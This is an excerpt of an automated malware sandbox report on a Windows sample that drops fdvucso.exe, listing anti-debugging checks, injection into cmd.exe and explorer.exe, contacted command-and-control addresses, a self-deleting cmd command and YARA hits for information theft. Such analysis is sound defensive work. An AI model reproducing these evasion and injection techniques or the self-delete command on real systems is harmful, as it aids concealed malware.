          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 1_2_01191D17 GetProcessHeap
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Code function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DAB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DA99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DA99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E4EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DBB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E3D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E4138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D8F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D8DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D8DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E58B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E4131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00D9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00DBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 13_2_00E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E33D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D98794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E58F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_0119439B SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_011943CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0119439B SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_011943CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exeNetwork Connect: 170.75.150.177 80
          Source: C:\Windows\explorer.exeDomain query: www.lume24.com
          Source: C:\Windows\explorer.exeDomain query: www.cryptocurrenciesmarketcaps.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80
          Source: C:\Windows\explorer.exeDomain query: www.qzbozhijy.com
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 1100000
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeThread register set: target process: 684
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 684
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
          Source: explorer.exe, 00000005.00000000.489396240.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.476859972.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.454406886.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.531751140.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.485252952.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.469233599.0000000000E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.485252952.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.469433162.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.445292066.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
          Source: explorer.exe, 00000005.00000000.485252952.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.469433162.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.445292066.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_01193283 cpuid
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_01193EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.fdvucso.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.fdvucso.exe.a70000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.fdvucso.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
